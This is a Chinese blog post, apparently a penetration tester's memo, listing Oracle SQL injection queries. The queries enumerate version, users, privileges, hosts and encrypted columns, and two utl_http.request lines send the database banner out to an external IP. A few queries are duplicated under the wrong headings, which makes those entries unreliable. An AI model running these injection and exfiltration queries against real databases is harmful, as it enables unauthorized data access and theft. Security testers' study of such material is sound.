oracle备忘录-注入

最新推荐文章于 2023-02-26 15:53:36 发布
最新推荐文章于 2023-02-26 15:53:36 发布
阅读量510 收藏
点赞数
分类专栏: oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ask_man/article/details/30213051
版权

1:枚举数据库配置信息

版本:select banner from v$version

当前用户:select user from dual;

所有用户:select user from dual;

用户权限:

select * from user_role_privs;
select * from user_table_privs;
select * from user_sys_privs;

服务器主机名:select sys_context('USERENV','HOST') from dual;
数据库服务器名:select sys_context('USERENV','SERVER_HOST') from dual;

建立外部链接:

select utl_http.request('http://192.168.38.141/web1/index.php') from dual;

select utl_http.request('http://192.168.38.141:1521/'||(select banner from v$version where rownum=1)) from dual;

2:模式信息

数据库名:SELECT global_name FROM global_name;

用户:SELECT global_name FROM global_name;

3:数据库加密信息

经过加密的表:SELECT table_name, column_name, salt FROM dba_encrypted_columns;

经加密的对象:SELECT owner,name,type FROM all_dependencies;

4:命令执行


ask_man
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ORACLE使用备忘录
PiaoMiaoXiaodao的博客
04-18 427
1.将一个用户SCHEMA下的表的增删查改权限赋予另一个用户 --假设现在要将test_u用户的SCHEMA下的所有表操作权限赋予test_user GRANT ALL ON test_tab TO test_user ;--将test_tab这表的操作权限赋予 test_user 这个用户 REVOKE ALL ON test_tab FROM test_user ;--将test_tab...
oracle备忘录
u013015301的博客
03-30 207
1.登录linux服务器 执行:su - oracle 执行:sqlplus 用户名/密码 使用dab登录命令,执行:sqlplus / as sysdba dba授权执行:grant dba to QXT_USER; (注:QXT_USER是用户名) 2.查看表空间使用情况 SELECT a.tablespace_name "表空间名", total "表空间大小", free "表空间剩余大小", (total - free) "表空间使用大小", total / (1024 * 1024 *
SQL注入备忘录
weixin_30501857的博客
04-05 615
备忘录(一) 拿起小本本记下常考知识点。 常用连接词 and && %23%23 且 or || %7c%7c 或 xor 非 Access 数据库: 只能爆破表名、列名获取数据、无法用盲注等 数据主要存储在mdb、sap文件内 0x01 手工: 先判断字段数: order by xx 在使用联合查询猜测表名列名: 前后两个子查询返回的结构必须相同,且数据类型必须相同,故常...
sql注入备忘录
weixin_30639719的博客
12-16 100
Sql注入备忘录 转载于:https://www.cnblogs.com/afanti/p/8047717.html
SQL 注入备忘录
周无争的博客
09-26 143
本文翻译自:https://portswigger.net/web-security/sql-injection/cheat-sheet 这份SQL注入备忘录包含一些有用的语法示例,您可以使用这些语法来执行各种任务,这些任务在执行SQL注入攻击时经常出现。 字符串连接 您可以将多个字符串连接成为一个字符串。 DBS Payload Oracle ‘foo’||‘bar’ Microsoft ‘foo’+‘bar’ PostgreSQL ‘foo’||‘bar’ MySQL ‘fo
project-ref-memo:项目参考备忘录
04-04
在IT行业中,项目管理是确保软件开发顺利进行的关键环节,而“项目参考备忘录”则是项目管理中不可或缺的一部分。这个文件名“project-ref-memo”暗示着这可能是一个记录项目相关信息、指导方针或者最佳实践的文档,...
2022oracle存储过程procedure秘籍参照.pdf
11-24
3. **关于Oracle存储过程的若干问题备忘**: - 数据表别名不加`AS`是Oracle的一个特性,可以直接使用`alias column_name`。 - `SELECT`语句在存储过程中,如果只选择单个字段,必须使用`INTO`将结果存入变量,如`...
开题报告-基于JSP个人信息管理系统的设计与实现.pdf
10-22
尽管市场上已有各种备忘录和便签类应用,但在应对大量复杂数据时,它们往往显得力不从心。基于JSP的个人信息管理系统则能提供更为全面和系统化的解决方案。 本项目旨在设计并实现一个基于JSP的个人信息管理系统,以...
java web开发典型模块大全
05-27
用户可以添加、编辑和删除备忘录,同时可能需要数据库支持(如MySQL、Oracle)来持久化数据。Spring框架的Model-View-Controller(MVC)架构能有效地组织此类应用的代码结构。 3. **搜索引擎模块**:在Web应用中,...
JAVA技术体系
04-13
- **行为模式**:如责任链、命令、解释器、迭代、中介者、备忘录、观察者、状态、策略、模板、访问者。 - **分布式技术**:包括 Hadoop 生态系统(HDFS、MapReduce)、云计算技术等。 #### 总结 通过以上知识点的...
由BurpSuite官方整理的SQL注入备忘录
weixin_52137383的博客
03-23 143
Burpsuite官方SQL注入备忘录
犀利的 oracle 注入技术
10-20 732
 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1 and 1的形式即可。(用" a|| "是为了让语句返回true值)语句有点长,可能要用post提交。以下是各个步骤:
SQL注入解析
Ask Self,Ask Tomorrow
11-15 255
--SQL注入 /* 概念 定义:一种代码注入技术,用于攻击基于数据库的应用,基本原理是将SQL语句插入到参数位置执行。 SQL 注入通过应用软件的安全漏洞(比如说用户输入的特殊字符没有被转义、或用户输入不是强类型导致意外执行)本质:用户输入作为SQL命令被执行Steps: 1. APP将表格发送给用户. 2. 攻击者将带有SQL注入的参数发送给WEB服务器. 3. APP利用用户输入的数据构建SQ
SQL注入 ——sql数据库操作基础(一)
Gjqhs的博客
02-16 1546
实验目的 熟悉 MySQL( MariaDB)薮据库的基础与进阶语法,加深对SQL命令语句的理解, 为后续SQL注入攻击与防护实验打下坚实的基础。 实验环境 (1)操作系统: Centos7 (2)安装的应用软件: Apache、 MySQL( MariaDB)、PHP;DWA、 SQLi-Labs Debug3.0漏洞网站环境 MySQL( MariaDB)数据库帐号root,密码为空 实验原理 MySQL( MariaDB)数据库基本命令的功能 实验步骤 第一部分: MySQL(
portswigger之SQL注入实验室笔记
m0_69349614的博客
07-06 1226
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
[zkaq靶场]SQL注入--Oracle报错注入
wwxxee
05-08 456
SQL注入Oracle报错注入 Oracle中用户的概念相当于库的概念。 select * from all_tables:查询所有的表 select * from user_tables:查询当前用户的所有表 select * from all_tab_columns查询所有的字段 select * from user_tab_columns:查询当前用户的所有表 select * from v$version:查询版本 意外插入:SQL语句的执行顺序: ​ 5.SELECT [DISTINCT] 分
查看oracle安装信息,查看Oracle基础配置信息和性能相关信息的脚本
weixin_39766910的博客
04-03 292
1.基础配置信息:--数据库版本检查select banner from v$version;--是否是RACselect parameter, valuefrom v$optionwhere parameter = 'Real Application Clusters';--数据库信息检查select dbid,name,log_mode,flashback_on,force_logging,o...
sql注入mysql判断_SQL注入判断数据库类型
weixin_36116139的博客
01-30 2460
SQL注入首先会判断服务端数据库的类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息0x00 常见网页类型对应数据库关系asp : Access/SQLServerphp : Mysqljsp : Oracle0x...
Oracle/PL/SQL数据库基础操作(持续更新)
最新发布
zh94264的博客
02-26 1万+
Oracle基本操作,增删改查~
"Oracle 12C NON-CDB数据库安装指南:详细准备步骤与安装流程
本文描述了在Oracle 12C NON-CDB数据库安装过程中的一些重要准备工作。在安装之前,首先需要确保安装所需的软件包是已经准备好的。在本文中,将会详细介绍这些软件包的安装过程以及一些必要的步骤和注意事项。 准备...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值